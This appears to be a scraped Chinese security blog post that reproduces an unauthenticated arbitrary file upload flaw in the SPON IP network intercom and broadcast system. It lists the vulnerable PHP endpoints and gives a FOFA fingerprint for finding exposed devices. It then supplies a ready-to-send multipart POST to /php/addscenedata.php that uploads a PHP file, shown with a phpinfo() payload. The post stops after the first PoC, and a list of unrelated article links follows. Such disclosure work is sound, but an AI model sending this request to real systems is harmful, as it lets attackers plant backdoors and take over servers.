当前位置: 首页 > news >正文

SPON世邦 IP网络对讲广播系统 多处文件上传漏洞复现

news 2025/8/24 6:52:12

0x01 产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

0x02 漏洞概述

SPON世邦IP网络对讲广播系统 addscenedata.php、uploadjson.php、my_parser.php等接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

0x03 复现环境

FOFA:icon_hash="-1830859634"

0x04 漏洞复现

PoC-1

POST /php/addscenedata.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
Accept-Encoding: gzip------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="1.php"
Content-Type: application/octet-stream<?php phpinfo(); ?>
--
http://www.lryc.cn/news/276287.html

相关文章:

  • Python综合数据分析_RFM用户分层模型
  • 【C++进阶04】STL中map、set、multimap、multiset的介绍及使用
  • 在 Linux 中开启 Flask 项目持续运行
  • 考研个人经验总结【心理向】
  • 如何在CentOS安装SQL Server数据库并通过内网穿透工具实现公网访问
  • jupyter内核错误
  • 设计模式的艺术P1基础—2.3 类之间的关系
  • 工业无人机行业研究:预计2025年将达到108.2亿美元
  • PCA主成分分析算法
  • Hyperledger Fabric 权限策略和访问控制
  • Day28 回溯算法part04 93. 复原IP地址 78. 子集 90. 子集 II
  • Linux系统常用的安全优化
  • Vue-4、单向数据绑定与双向数据绑定
  • 【Flutter 开发实战】Dart 基础篇:常用运算符
  • C++:ifstream通过getline读取文件会忽略最后一行空行
  • 力扣123. 买卖股票的最佳时机 III
  • Vue3:vue-cli项目创建
  • C# .Net学习笔记—— 异步和多线程(Task)
  • Python从入门到网络爬虫(读写Excel详解)
  • Mysql之子查询、连接查询(内外)以及分页查询
  • 计算机的存储单位
  • 设备树文件中的设备节点
  • 文件管理工具.netcore资源文件管理
  • go-carbon v2.3.4 发布,轻量级、语义化、对开发者友好的 Golang 时间处理库
  • vue3 内置组件
  • MFC如何动态创建button按钮并添加点击事件
  • Qt - QML框架
  • Python+Flask+MySQL的图书馆管理系统【附源码,运行简单】
  • Module-Federation[微前端]
  • Spring 动态数据源事务处理